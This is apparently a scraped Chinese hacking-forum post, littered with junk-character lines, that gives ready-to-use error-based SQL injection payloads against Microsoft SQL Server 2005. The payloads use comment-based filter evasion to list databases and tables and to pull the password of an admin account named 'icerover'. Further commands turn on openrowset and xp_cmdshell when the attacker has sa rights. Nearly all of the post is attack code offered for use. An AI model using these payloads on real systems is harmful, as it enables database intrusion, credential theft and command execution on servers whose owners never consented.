5 p$ | C* y! H2 ]& b# }
8 b6 ~) i7 x+ r$ [! r2 q
/ `7 E& r9 q! {[Copy to clipboard]CODE:9 }5 ~- e" G' p7 x
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
. Z9 w; H8 P3 m3 p6 W% ]# ^! F0 w2 b' ~2 ~ q7 Y
爆表语句,somedb部份是所要列的数据库,红色数字1累加) W. @ {: ]2 }9 u
9 x: L ^2 s$ \' f6 G2 r( q2 J. ~
- K3 C: k+ ?" f- ~[Copy to clipboard]CODE:
. H, Q9 A+ G; U% n- O( j/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--; f0 y8 h, L4 m7 w* y$ k* C
3 Q; F( ]- L5 v6 M
爆字段语句,爆表admin里user='icerover'的密码段
* D% r, N8 a& v) \; E3 ?- D* d
& d6 Y2 V7 a2 P4 F: X+ A8 s- H+ g
" Q9 B1 R) m8 c5 v. b$ H$ D. M7 Q1 j+ ][Copy to clipboard]CODE:
& a# [1 {9 ^" K**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--! g m+ a. P* q
3 k; d+ \0 d$ o; Emssql2005默认没有开xp_cmdshell的,openrowset也不能用
& N' B1 u: d! p h# E如果是sa权限,可以这样来开启
% ?# _* a6 N! U5 |, V+ g) n开启openrowset" l ^) N/ {1 F: i9 }+ B* Z- j
0 l' o8 @' R# C/ [+ h7 ] d) G
' X4 V- {5 [( z8 w. ~! [[Copy to clipboard]CODE:
2 j; Y8 n f" j" [/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
& B0 A0 E! o" l/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--# m o8 v# |/ W
' }/ z" y. C. O3 F9 e% ^8 Z开启xp_cmdshell9 {- d2 w/ Q" d: e3 h, X$ Z
& K! {2 o0 ^, y. R: @% d- S, M Z4 C, Y' v
! ?/ J/ S# p* W0 ?* h$ [[Copy to clipboard]CODE:) ]3 S, k+ v0 P I
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
3 m% w, ], P Y: ] }% d& aEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--& m$ `9 B) L- c. c/ P
0 {/ g4 g% e" L( c& Z" y8 b7 I
ok,over~~晚安
0 f! d& U) G' s5 N) Y" s. s |